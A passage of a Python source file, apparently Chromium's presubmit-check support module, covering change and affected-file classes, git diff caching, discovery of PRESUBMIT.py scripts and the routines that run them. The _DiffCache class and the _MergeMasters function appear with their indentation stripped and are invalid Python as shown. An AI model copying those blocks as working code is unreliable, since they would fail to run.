    Note: The carriage return (LF or CR) is stripped off.
    """
    files = self.AffectedSourceFiles(source_file_filter)
    return _RightHandSideLinesImpl(files)

  def ReadFile(self, file_item, mode='r'):
    """Reads an arbitrary file.

    Deny reading anything outside the repository.
    """
    if isinstance(file_item, AffectedFile):
      file_item = file_item.AbsoluteLocalPath()
    if not file_item.startswith(self.change.RepositoryRoot()):
      raise IOError('Access outside the repository root is denied.')
    return gclient_utils.FileRead(file_item, mode)

  def CreateTemporaryFile(self, **kwargs):
    """Returns a named temporary file that must be removed with a call to
    RemoveTemporaryFiles().

    All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
    except for |delete|, which is always set to False.

    Presubmit checks that need to create a temporary file and pass it for
    reading should use this function instead of NamedTemporaryFile(), as
    Windows fails to open a file that is already open for writing.

      with input_api.CreateTemporaryFile() as f:
        f.write('xyz')
        f.close()
        input_api.subprocess.check_output(['script-that', '--reads-from',
                                           f.name])

    Note that callers of CreateTemporaryFile() should not worry about removing
    any temporary file; this is done transparently by the presubmit handling
    code.
    """
    if 'delete' in kwargs:
      # Prevent users from passing |delete|; we take care of file deletion
      # ourselves and this prevents unintuitive error messages when we pass
      # delete=False and 'delete' is also in kwargs.
      raise TypeError('CreateTemporaryFile() does not take a "delete" '
                      'argument, file deletion is handled automatically by '
                      'the same presubmit_support code that creates InputApi '
                      'objects.')
    temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
    self._named_temporary_files.append(temp_file.name)
    return temp_file

  @property
  def tbr(self):
    """Returns if a change is TBR'ed."""
    return 'TBR' in self.change.tags or self.change.TBRsFromDescription()

  def RunTests(self, tests_mix, parallel=True):
    """Queues tests on the shared thread pool; returns any immediate messages.

    Returns:
      A list of PresubmitResult messages: the plain results passed through in
      tests_mix, plus — when self.parallel is off — the results of running the
      queued tests synchronously.
    """
    # RunTests doesn't actually run tests. It adds them to a ThreadPool that
    # will run all tests once all PRESUBMIT files are processed.
    tests = []
    msgs = []
    for t in tests_mix:
      if isinstance(t, OutputApi.PresubmitResult) and t:
        msgs.append(t)
      else:
        assert issubclass(t.message, _PresubmitResult)
        tests.append(t)
        if self.verbose:
          t.info = _PresubmitNotifyResult
        # Tests run from the presubmit script's directory unless told otherwise.
        if not t.kwargs.get('cwd'):
          t.kwargs['cwd'] = self.PresubmitLocalPath()
    self.thread_pool.AddTests(tests, parallel)
    if not self.parallel:
      msgs.extend(self.thread_pool.RunAsync())
    return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
  """DiffCache implementation for git; gets all file diffs at once."""

  def __init__(self, upstream):
    super(_GitDiffCache, self).__init__(upstream=upstream)
    # Lazily-built map of normalized path -> unified diff text; populated on
    # the first GetDiff() call.
    self._diffs_by_file = None

  def GetDiff(self, path, local_root):
    """Returns the unified diff for |path|, computing all diffs on first use.

    Raises:
      PresubmitFailure: if the change's diff has no entry for |path| or the
        diff output cannot be parsed.
    """
    if not self._diffs_by_file:
      # Compute a single diff for all files and parse the output; should
      # with git this is much faster than computing one diff for each file.
      diffs = {}

      # Don't specify any filenames below, because there are command line length
      # limits on some platforms and GenerateDiff would fail.
      unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
                                          branch=self._upstream)

      # This regex matches the path twice, separated by a space. Note that
      # filename itself may contain spaces.
      file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
      current_diff = []
      keep_line_endings = True
      for x in unified_diff.splitlines(keep_line_endings):
        match = file_marker.match(x)
        if match:
          # Marks the start of a new per-file section.
          diffs[match.group('filename')] = current_diff = [x]
        elif x.startswith('diff --git'):
          # A 'diff --git' line that did not match file_marker (e.g. a rename
          # where the two paths differ) is a parse failure.
          raise PresubmitFailure('Unexpected diff line: %s' % x)
        else:
          current_diff.append(x)

      self._diffs_by_file = dict(
        (normpath(path), ''.join(diff)) for path, diff in list(diffs.items()))

    if path not in self._diffs_by_file:
      raise PresubmitFailure(
          'Unified diff did not contain entry for file %s' % path)

    return self._diffs_by_file[path]

  def GetOldContents(self, path, local_root):
    """Returns the contents of |path| at the upstream revision."""
    return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
  """Representation of a file in a change."""

  # SCM-specific diff cache class; subclasses override (see GitAffectedFile).
  DIFF_CACHE = _DiffCache

  # Method could be a function
  # pylint: disable=no-self-use
  def __init__(self, path, action, repository_root, diff_cache):
    self._path = path
    # Single-letter SCM action code, e.g. 'A', 'M', 'D'.
    self._action = action
    self._local_root = repository_root
    self._is_directory = None
    # Lazily-computed caches; None until first use.
    self._cached_changed_contents = None
    self._cached_new_contents = None
    self._diff_cache = diff_cache
    logging.debug('%s(%s)', self.__class__.__name__, self._path)

  def LocalPath(self):
    """Returns the path of this file on the local disk relative to client root.

    This should be used for error messages but not for accessing files,
    because presubmit checks are run with CWD=PresubmitLocalPath() (which is
    often != client root).
    """
    return normpath(self._path)

  def AbsoluteLocalPath(self):
    """Returns the absolute path of this file on the local disk.
    """
    return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))

  def Action(self):
    """Returns the action on this opened file, e.g. A, M, D, etc."""
    return self._action

  def IsTestableFile(self):
    """Returns True if the file is a text file and not a binary file.

    Deleted files are not text file."""
    raise NotImplementedError()  # Implement when needed

  def IsTextFile(self):
    """An alias to IsTestableFile for backwards compatibility."""
    return self.IsTestableFile()

  def OldContents(self):
    """Returns an iterator over the lines in the old version of file.

    The old version is the file before any modifications in the user's
    workspace, i.e. the "left hand side".

    Contents will be empty if the file is a directory or does not exist.
    Note: The carriage returns (LF or CR) are stripped off.
    """
    return self._diff_cache.GetOldContents(self.LocalPath(),
                                           self._local_root).splitlines()

  def NewContents(self):
    """Returns an iterator over the lines in the new version of file.

    The new version is the file in the user's workspace, i.e. the "right hand
    side".

    Contents will be empty if the file is a directory or does not exist.
    Note: The carriage returns (LF or CR) are stripped off.
    """
    if self._cached_new_contents is None:
      self._cached_new_contents = []
      try:
        self._cached_new_contents = gclient_utils.FileRead(
            self.AbsoluteLocalPath(), 'rU').splitlines()
      except IOError:
        pass  # File not found? That's fine; maybe it was deleted.
    # Return a copy so callers cannot corrupt the cache.
    return self._cached_new_contents[:]

  def ChangedContents(self):
    """Returns a list of tuples (line number, line text) of all new lines.

     This relies on the scm diff output describing each changed code section
     with a line of the form

     ^@@ <old line num>,<old size> <new line num>,<new size> @@$
    """
    if self._cached_changed_contents is not None:
      return self._cached_changed_contents[:]
    self._cached_changed_contents = []
    line_num = 0

    for line in self.GenerateScmDiff().splitlines():
      # A hunk header resets the new-side line counter.
      m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
      if m:
        line_num = int(m.groups(1)[0])
        continue
      # '+' lines (but not the '+++' file header) are added lines.
      if line.startswith('+') and not line.startswith('++'):
        self._cached_changed_contents.append((line_num, line[1:]))
      # Everything except removed lines advances the new-side line number.
      if not line.startswith('-'):
        line_num += 1
    return self._cached_changed_contents[:]

  def __str__(self):
    return self.LocalPath()

  def GenerateScmDiff(self):
    """Returns the raw unified diff text for this file."""
    return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
  """A file touched by a change in a git checkout."""
  # Method 'NNN' is abstract in class 'NNN' but is not overridden
  # pylint: disable=abstract-method
  DIFF_CACHE = _GitDiffCache

  def __init__(self, *args, **kwargs):
    AffectedFile.__init__(self, *args, **kwargs)
    self._server_path = None
    # Lazily-computed testability flag; None means "not determined yet".
    self._is_testable_file = None

  def IsTestableFile(self):
    """Returns True iff the file still exists on disk; deletions are never
    testable. The answer is computed once and cached."""
    if self._is_testable_file is None:
      # A deleted file cannot be inspected; anything else is testable exactly
      # when it is a regular file in the workspace.
      self._is_testable_file = (
          self.Action() != 'D' and os.path.isfile(self.AbsoluteLocalPath()))
    return self._is_testable_file
class Change(object):
  """Describe a change.

  Used directly by the presubmit scripts to query the current change being
  tested.

  Instance members:
    tags: Dictionary of KEY=VALUE pairs found in the change description.
    self.KEY: equivalent to tags['KEY']
  """

  _AFFECTED_FILES = AffectedFile

  # Matches key/value (or "tag") lines in changelist descriptions.
  TAG_LINE_RE = re.compile(
      '^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
  scm = ''

  def __init__(
      self, name, description, local_root, files, issue, patchset, author,
      upstream=None):
    """Args:
      name: The change name.
      description: Full change description text, including tag lines.
      local_root: Checkout root; converted to an absolute path.
      files: Iterable of (action, path) pairs, or None for no files.
      issue/patchset/author: Code-review metadata.
      upstream: Revision diffs are computed against (passed to DIFF_CACHE).
    """
    if files is None:
      files = []
    self._name = name
    # Convert root into an absolute path.
    self._local_root = os.path.abspath(local_root)
    self._upstream = upstream
    self.issue = issue
    self.patchset = patchset
    self.author_email = author

    self._full_description = ''
    self.tags = {}
    self._description_without_tags = ''
    self.SetDescriptionText(description)

    assert all(
        (isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files

    # One diff cache is shared by all AffectedFile instances of this change.
    diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
    self._affected_files = [
        self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
        for action, path in files
    ]

  def Name(self):
    """Returns the change name."""
    return self._name

  def DescriptionText(self):
    """Returns the user-entered changelist description, minus tags.

    Any line in the user-provided description starting with e.g. "FOO="
    (whitespace permitted before and around) is considered a tag line. Such
    lines are stripped out of the description this function returns.
    """
    return self._description_without_tags

  def FullDescriptionText(self):
    """Returns the complete changelist description including tags."""
    return self._full_description

  def SetDescriptionText(self, description):
    """Sets the full description text (including tags) to |description|.

    Also updates the list of tags."""
    self._full_description = description

    # From the description text, build up a dictionary of key/value pairs
    # plus the description minus all key/value or "tag" lines.
    description_without_tags = []
    self.tags = {}
    for line in self._full_description.splitlines():
      m = self.TAG_LINE_RE.match(line)
      if m:
        self.tags[m.group('key')] = m.group('value')
      else:
        description_without_tags.append(line)

    # Change back to text and remove whitespace at end.
    self._description_without_tags = (
        '\n'.join(description_without_tags).rstrip())

  def RepositoryRoot(self):
    """Returns the repository (checkout) root directory for this change,
    as an absolute path.
    """
    return self._local_root

  def __getattr__(self, attr):
    """Return tags directly as attributes on the object."""
    # NOTE: only [A-Z_]* names reach the tag dict; tags whose keys contain
    # digits (allowed by TAG_LINE_RE) are not reachable as attributes.
    if not re.match(r"^[A-Z_]*$", attr):
      raise AttributeError(self, attr)
    return self.tags.get(attr)

  def BugsFromDescription(self):
    """Returns all bugs referenced in the commit description."""
    tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
    footers = git_footers.parse_footers(self._full_description).get('Bug', [])
    return sorted(set(tags + footers))

  def ReviewersFromDescription(self):
    """Returns all reviewers listed in the commit description."""
    # We don't support a "R:" git-footer for reviewers; that is in metadata.
    tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
    return sorted(set(tags))

  def TBRsFromDescription(self):
    """Returns all TBR reviewers listed in the commit description."""
    tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
    # TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
    # determined by self-CR+1s.
    footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
    return sorted(set(tags + footers))

  # TODO(agable): Delete these once we're sure they're unused.
  @property
  def BUG(self):
    return ','.join(self.BugsFromDescription())
  @property
  def R(self):
    return ','.join(self.ReviewersFromDescription())
  @property
  def TBR(self):
    return ','.join(self.TBRsFromDescription())

  def AllFiles(self, root=None):
    """List all files under source control in the repo."""
    raise NotImplementedError()

  def AffectedFiles(self, include_deletes=True, file_filter=None):
    """Returns a list of AffectedFile instances for all files in the change.

    Args:
      include_deletes: If false, deleted files will be filtered out.
      file_filter: An additional filter to apply.

    Returns:
      [AffectedFile(path, action), AffectedFile(path, action)]
    """
    affected = list(filter(file_filter, self._affected_files))

    if include_deletes:
      return affected
    return [x for x in affected if x.Action() != 'D']

  def AffectedTestableFiles(self, include_deletes=None, **kwargs):
    """Return a list of the existing text files in a change."""
    if include_deletes is not None:
      # Message fixed: it previously read "AffectedTeestableFiles" (typo),
      # inconsistent with InputApi.AffectedTestableFiles's warning.
      warn("AffectedTestableFiles(include_deletes=%s)"
               " is deprecated and ignored" % str(include_deletes),
           category=DeprecationWarning,
           stacklevel=2)
    return [x for x in self.AffectedFiles(include_deletes=False, **kwargs) if x.IsTestableFile()]

  def AffectedTextFiles(self, include_deletes=None):
    """An alias to AffectedTestableFiles for backwards compatibility."""
    return self.AffectedTestableFiles(include_deletes=include_deletes)

  def LocalPaths(self):
    """Convenience function."""
    return [af.LocalPath() for af in self.AffectedFiles()]

  def AbsoluteLocalPaths(self):
    """Convenience function."""
    return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]

  def RightHandSideLines(self):
    """An iterator over all text lines in "new" version of changed files.

    Lists lines from new or modified text files in the change.

    This is useful for doing line-by-line regex checks, like checking for
    trailing whitespace.

    Yields:
      a 3 tuple:
        the AffectedFile instance of the current file;
        integer line number (1-based); and
        the contents of the line as a string.
    """
    return _RightHandSideLinesImpl(
        x for x in self.AffectedFiles(include_deletes=False)
        if x.IsTestableFile())

  def OriginalOwnersFiles(self):
    """A map from path names of affected OWNERS files to their old content."""
    def owners_file_filter(f):
      return 'OWNERS' in os.path.split(f.LocalPath())[1]
    files = self.AffectedFiles(file_filter=owners_file_filter)
    return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
  """A Change backed by a git checkout."""
  _AFFECTED_FILES = GitAffectedFile
  scm = 'git'

  def AllFiles(self, root=None):
    """List all files under source control in the repo."""
    root = root or self.RepositoryRoot()
    # core.quotePath=false keeps non-ASCII paths unescaped in the output.
    cmd = ['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.']
    return subprocess.check_output(cmd, cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
  """Finds all presubmit files that apply to a given set of source files.

  If inherit-review-settings-ok is present right under root, looks for
  PRESUBMIT.py in directories enclosing root.

  Args:
    files: An iterable container containing file paths.
    root: Path where to stop searching.

  Return:
    List of absolute paths of the existing PRESUBMIT.py scripts.
  """
  normalized = [normpath(os.path.join(root, f)) for f in files]
  # Start from the directory of every affected file.
  directories = set(os.path.dirname(f) for f in normalized)

  # With inherit-review-settings-ok present, the upward walk may continue
  # past |root| all the way to the filesystem root.
  if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
    root = None

  # Walk each starting directory upward toward |root|, recording every
  # distinct directory seen on the way.
  candidates = set()
  for directory in directories:
    while directory not in candidates:
      candidates.add(directory)
      if directory == root:
        break
      parent = os.path.dirname(directory)
      if parent == directory:
        # We hit the system root directory.
        break
      directory = parent

  # Keep only PRESUBMIT*.py scripts that exist, skipping PRESUBMIT_test*.
  results = []
  for directory in sorted(candidates):
    try:
      entries = os.listdir(directory)
    except OSError:
      continue
    for entry in entries:
      candidate = os.path.join(directory, entry)
      if (os.path.isfile(candidate) and
          re.match(r'PRESUBMIT.*\.py$', entry) and
          not entry.startswith('PRESUBMIT_test')):
        results.append(candidate)

  logging.debug('Presubmit files: %s', ','.join(results))
  return results
class GetTryMastersExecuter(object):
  @staticmethod
  def ExecPresubmitScript(script_text, presubmit_path, project, change):
    """Executes GetPreferredTryMasters() from a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: Project script to run.
      project: Project name to pass to presubmit script for bot selection.

    Return:
      A map of try masters to map of builders to set of tests.
    """
    context = {}
    try:
      exec(script_text, context)
    except Exception as e:
      raise PresubmitFailure('"%s" had an exception.\n%s'
                             % (presubmit_path, e))

    # A script that never defines the hook simply contributes nothing.
    if 'GetPreferredTryMasters' not in context:
      return {}

    hook = context['GetPreferredTryMasters']
    if len(inspect.getargspec(hook)[0]) != 2:
      raise PresubmitFailure(
          'Expected function "GetPreferredTryMasters" to take two arguments.')
    return hook(project, change)
class GetPostUploadExecuter(object):
  @staticmethod
  def ExecPresubmitScript(script_text, presubmit_path, cl, change):
    """Executes PostUploadHook() from a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: Project script to run.
      cl: The Changelist object.
      change: The Change object.

    Return:
      A list of results objects.
    """
    context = {}
    try:
      exec(script_text, context)
    except Exception as e:
      raise PresubmitFailure('"%s" had an exception.\n%s'
                             % (presubmit_path, e))

    # A script without the hook contributes no results.
    if 'PostUploadHook' not in context:
      return {}

    hook = context['PostUploadHook']
    if len(inspect.getargspec(hook)[0]) != 3:
      raise PresubmitFailure(
          'Expected function "PostUploadHook" to take three arguments.')
    return hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(iter(masters1.items()),
iter(masters2.items())):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
                    changed_files,
                    repository_root,
                    default_presubmit,
                    project,
                    verbose,
                    output_stream):
  """Get the list of try masters from the presubmit scripts.

  Args:
    change: The Change object.
    changed_files: List of modified files.
    repository_root: The repository root.
    default_presubmit: A default presubmit script to execute in any case.
    project: Optional name of a project used in selecting trybots.
    verbose: Prints debug info.
    output_stream: A stream to write debug output to.

  Return:
    Map of try masters to map of builders to set of tests.
  """
  presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
  if not presubmit_files and verbose:
    output_stream.write("Warning, no PRESUBMIT.py found.\n")
  results = {}
  executer = GetTryMastersExecuter()

  # The default script, when given, runs first with a synthetic path at the
  # repo root.
  if default_presubmit:
    if verbose:
      output_stream.write("Running default presubmit script.\n")
    fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
    results = _MergeMasters(results, executer.ExecPresubmitScript(
        default_presubmit, fake_path, project, change))
  for filename in presubmit_files:
    filename = os.path.abspath(filename)
    if verbose:
      output_stream.write("Running %s\n" % filename)
    # Accept CRLF presubmit script.
    presubmit_script = gclient_utils.FileRead(filename, 'rU')
    results = _MergeMasters(results, executer.ExecPresubmitScript(
        presubmit_script, filename, project, change))

  # Make sets to lists again for later JSON serialization.
  for builders in results.values():
    for builder in builders:
      builders[builder] = list(builders[builder])

  if results and verbose:
    output_stream.write('%s\n' % str(results))
  return results
def DoPostUploadExecuter(change,
                         cl,
                         repository_root,
                         verbose,
                         output_stream):
  """Execute the post upload hook.

  Args:
    change: The Change object.
    cl: The Changelist object.
    repository_root: The repository root.
    verbose: Prints debug info.
    output_stream: A stream to write debug output to.

  Returns:
    The accumulated list of hook result objects.
  """
  presubmit_files = ListRelevantPresubmitFiles(
      change.LocalPaths(), repository_root)
  if not presubmit_files and verbose:
    output_stream.write("Warning, no PRESUBMIT.py found.\n")
  results = []
  executer = GetPostUploadExecuter()
  # The root presubmit file should be executed after the ones in subdirectories.
  # i.e. the specific post upload hooks should run before the general ones.
  # Thus, reverse the order provided by ListRelevantPresubmitFiles.
  presubmit_files.reverse()

  for filename in presubmit_files:
    filename = os.path.abspath(filename)
    if verbose:
      output_stream.write("Running %s\n" % filename)
    # Accept CRLF presubmit script.
    presubmit_script = gclient_utils.FileRead(filename, 'rU')
    results.extend(executer.ExecPresubmitScript(
        presubmit_script, filename, cl, change))
  output_stream.write('\n')
  if results:
    output_stream.write('** Post Upload Hook Messages **\n')
  for result in results:
    result.handle(output_stream)
    output_stream.write('\n')

  return results
class PresubmitExecuter(object):
  """Loads a single PRESUBMIT.py script and runs its check entry point."""

  def __init__(self, change, committing, verbose,
               gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
    """
    Args:
      change: The Change object.
      committing: True if 'git cl land' is running, False if 'git cl upload' is.
      gerrit_obj: provides basic Gerrit codereview functionality.
      dry_run: if true, some Checks will be skipped.
      parallel: if true, all tests reported via input_api.RunTests for all
                PRESUBMIT files will be run in parallel.
    """
    self.change = change
    self.committing = committing
    self.gerrit = gerrit_obj
    self.verbose = verbose
    self.dry_run = dry_run
    # Extra CC email addresses accumulated from each executed script.
    self.more_cc = []
    self.thread_pool = thread_pool
    self.parallel = parallel

  def ExecPresubmitScript(self, script_text, presubmit_path):
    """Executes a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: The path to the presubmit file (this will be reported via
        input_api.PresubmitLocalPath()).

    Return:
      A list of result objects, empty if no problems.
    """
    # Change to the presubmit file's directory to support local imports.
    main_path = os.getcwd()
    os.chdir(os.path.dirname(presubmit_path))

    # Load the presubmit script into context.
    input_api = InputApi(self.change, presubmit_path, self.committing,
                         self.verbose, gerrit_obj=self.gerrit,
                         dry_run=self.dry_run, thread_pool=self.thread_pool,
                         parallel=self.parallel)
    output_api = OutputApi(self.committing)
    context = {}
    try:
      # The script is trusted repo-local code; it runs with a fresh globals
      # dict so state does not leak between PRESUBMIT files.
      exec(script_text, context)
    except Exception as e:
      raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))

    # These function names must change if we make substantial changes to
    # the presubmit API that are not backwards compatible.
    if self.committing:
      function_name = 'CheckChangeOnCommit'
    else:
      function_name = 'CheckChangeOnUpload'
    if function_name in context:
      try:
        context['__args'] = (input_api, output_api)
        logging.debug('Running %s in %s', function_name, presubmit_path)
        result = eval(function_name + '(*__args)', context)
        logging.debug('Running %s done.', function_name)
        self.more_cc.extend(output_api.more_cc)
      finally:
        # Always remove files created via input_api.CreateTemporaryFile(),
        # even when the check function raised.
        list(map(os.remove, input_api._named_temporary_files))
      if not (isinstance(result, tuple) or
              isinstance(result, list)):
        raise PresubmitFailure(
          'Presubmit functions must return a tuple or list')
      for item in result:
        if not isinstance(item, OutputApi.PresubmitResult):
          raise PresubmitFailure(
            'All presubmit results must be of types derived from '
            'output_api.PresubmitResult')
    else:
      result = ()  # no error since the script doesn't care about current event.

    # Return the process to the original working directory.
    os.chdir(main_path)
    return result
def DoPresubmitChecks(change,
                      committing,
                      verbose,
                      output_stream,
                      input_stream,
                      default_presubmit,
                      may_prompt,
                      gerrit_obj,
                      dry_run=None,
                      parallel=False):
  """Runs all presubmit checks that apply to the files in the change.

  This finds all PRESUBMIT.py files in directories enclosing the files in the
  change (up to the repository root) and calls the relevant entrypoint function
  depending on whether the change is being committed or uploaded.

  Prints errors, warnings and notifications.  Prompts the user for warnings
  when needed.

  Args:
    change: The Change object.
    committing: True if 'git cl land' is running, False if 'git cl upload' is.
    verbose: Prints debug info.
    output_stream: A stream to write output from presubmit tests to.
    input_stream: A stream to read input from the user.
    default_presubmit: A default presubmit script to execute in any case.
    may_prompt: Enable (y/n) questions on warning or error. If False,
                any questions are answered with yes by default.
    gerrit_obj: provides basic Gerrit codereview functionality.
    dry_run: if true, some Checks will be skipped.
    parallel: if true, all tests specified by input_api.RunTests in all
              PRESUBMIT files will be run in parallel.

  Warning:
    If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
    SHOULD be sys.stdin.

  Return:
    A PresubmitOutput object. Use output.should_continue() to figure out
    if there were errors or warnings and the caller should abort.
  """
  # Save the environment so it can be restored in the finally below; the copy
  # is mutated to suppress .pyc generation in child processes.
  old_environ = os.environ
  try:
    # Make sure python subprocesses won't generate .pyc files.
    os.environ = os.environ.copy()
    os.environ['PYTHONDONTWRITEBYTECODE'] = '1'

    output = PresubmitOutput(input_stream, output_stream)
    if committing:
      output.write("Running presubmit commit checks ...\n")
    else:
      output.write("Running presubmit upload checks ...\n")
    start_time = time.time()
    presubmit_files = ListRelevantPresubmitFiles(
        change.AbsoluteLocalPaths(), change.RepositoryRoot())
    if not presubmit_files and verbose:
      output.write("Warning, no PRESUBMIT.py found.\n")
    results = []
    # One shared pool: every PRESUBMIT.py queues its RunTests work here and
    # RunAsync() below drains them all at once.
    thread_pool = ThreadPool()
    executer = PresubmitExecuter(change, committing, verbose,
                                 gerrit_obj, dry_run, thread_pool)
    if default_presubmit:
      if verbose:
        output.write("Running default presubmit script.\n")
      fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
      results += executer.ExecPresubmitScript(default_presubmit, fake_path)
    for filename in presubmit_files:
      filename = os.path.abspath(filename)
      if verbose:
        output.write("Running %s\n" % filename)
      # Accept CRLF presubmit script.
      presubmit_script = gclient_utils.FileRead(filename, 'rU')
      results += executer.ExecPresubmitScript(presubmit_script, filename)
    results += thread_pool.RunAsync()

    output.more_cc.extend(executer.more_cc)

    # Bucket every result by severity for the summary output below.
    errors = []
    notifications = []
    warnings = []
    for result in results:
      if result.fatal:
        errors.append(result)
      elif result.should_prompt:
        warnings.append(result)
      else:
        notifications.append(result)

    output.write('\n')
    for name, items in (('Messages', notifications),
                        ('Warnings', warnings),
                        ('ERRORS', errors)):
      if items:
        output.write('** Presubmit %s **\n' % name)
        for item in items:
          item.handle(output)
          output.write('\n')

    total_time = time.time() - start_time
    if total_time > 1.0:
      output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)

    if errors:
      output.fail()
    elif warnings:
      output.write('There were presubmit warnings. ')
      if may_prompt:
        output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
    else:
      output.write('Presubmit checks passed.\n')

    global _ASKED_FOR_FEEDBACK
    # Ask for feedback one time out of 5.
    if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
      output.write(
          'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
          'to figure out which PRESUBMIT.py was run, then run git blame\n'
          'on the file to figure out who to ask for help.\n')
      _ASKED_FOR_FEEDBACK = True
    return output
  finally:
    os.environ = old_environ
def ScanSubDirs(mask, recursive):
  """Returns paths under the current directory matching the glob |mask|.

  With recursive=False only the top level is globbed; otherwise the whole
  tree is walked.  SCM metadata (.svn/.git) is always excluded.
  """
  if not recursive:
    return [path for path in glob.glob(mask) if path not in ('.svn', '.git')]

  matches = []
  for root, dirs, files in os.walk('.'):
    # Prune SCM metadata directories so os.walk never descends into them.
    for scm_dir in ('.svn', '.git'):
      if scm_dir in dirs:
        dirs.remove(scm_dir)
    matches.extend(os.path.join(root, name)
                   for name in files if fnmatch.fnmatch(name, mask))
  return matches
def ParseFiles(args, recursive):
  """Expands each glob in |args| into a list of ('M', filename) tuples."""
  logging.debug('Searching for %s', args)
  found = []
  for mask in args:
    found.extend(('M', name) for name in ScanSubDirs(mask, recursive))
  return found
def load_files(options, args):
  """Tries to determine the SCM.

  Returns a (change_class, files) pair: GitChange plus the git status of the
  tree when under git, Change plus the explicitly listed files otherwise, or
  (None, None) when unversioned and no files were given.
  """
  files = []
  if args:
    files = ParseFiles(args, options.recursive)
  change_scm = scm.determine_scm(options.root)
  if change_scm == 'git':
    change_class = GitChange
    upstream = options.upstream or None
    # No explicit files: fall back to everything git reports as modified.
    if not files:
      files = scm.GIT.CaptureStatus([], options.root, upstream)
  else:
    logging.info('Doesn\'t seem under source control. Got %d files', len(args))
    # Unversioned directory with no explicit file list: nothing to check.
    if not files:
      return None, None
    change_class = Change
  return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
  """Context manager that temporarily no-ops the named canned checks.

  Each name in |method_names| that exists on presubmit_canned_checks is
  replaced with a stub returning [] for the duration of the block, and the
  original method is restored on exit (even on exception).  Unknown names
  are logged and skipped.
  """
  filtered = {}
  try:
    for method_name in method_names:
      if not hasattr(presubmit_canned_checks, method_name):
        # logging.warn is deprecated; use warning() with lazy %-args instead
        # of pre-formatting the message.
        logging.warning('Skipping unknown "canned" check %s', method_name)
        continue
      filtered[method_name] = getattr(presubmit_canned_checks, method_name)
      setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
    yield
  finally:
    # Restore every method that was stubbed out above.
    for name, method in filtered.items():
      setattr(presubmit_canned_checks, name, method)
def main(argv=None):
  """Command-line entry point for running presubmit checks directly.

  Returns a process exit code: falsy on success, truthy when checks say to
  abort, 2 on PresubmitFailure.
  """
  parser = optparse.OptionParser(usage="%prog [options] <files...>",
                                 version="%prog " + str(__version__))
  parser.add_option("-c", "--commit", action="store_true", default=False,
                    help="Use commit instead of upload checks")
  parser.add_option("-u", "--upload", action="store_false", dest='commit',
                    help="Use upload instead of commit checks")
  parser.add_option("-r", "--recursive", action="store_true",
                    help="Act recursively")
  parser.add_option("-v", "--verbose", action="count", default=0,
                    help="Use 2 times for more debug info")
  parser.add_option("--name", default='no name')
  parser.add_option("--author")
  parser.add_option("--description", default='')
  parser.add_option("--issue", type='int', default=0)
  parser.add_option("--patchset", type='int', default=0)
  parser.add_option("--root", default=os.getcwd(),
                    help="Search for PRESUBMIT.py up to this directory. "
                         "If inherit-review-settings-ok is present in this "
                         "directory, parent directories up to the root file "
                         "system directories will also be searched.")
  parser.add_option("--upstream",
                    help="Git only: the base ref or upstream branch against "
                         "which the diff should be computed.")
  parser.add_option("--default_presubmit")
  parser.add_option("--may_prompt", action='store_true', default=False)
  parser.add_option("--skip_canned", action='append', default=[],
                    help="A list of checks to skip which appear in "
                         "presubmit_canned_checks. Can be provided multiple times "
                         "to skip multiple canned checks.")
  parser.add_option("--dry_run", action='store_true',
                    help=optparse.SUPPRESS_HELP)
  parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
  parser.add_option("--gerrit_fetch", action='store_true',
                    help=optparse.SUPPRESS_HELP)
  parser.add_option('--parallel', action='store_true',
                    help='Run all tests specified by input_api.RunTests in all '
                         'PRESUBMIT files in parallel.')
  options, args = parser.parse_args(argv)

  # -v once selects INFO, twice (or more) DEBUG, otherwise only errors.
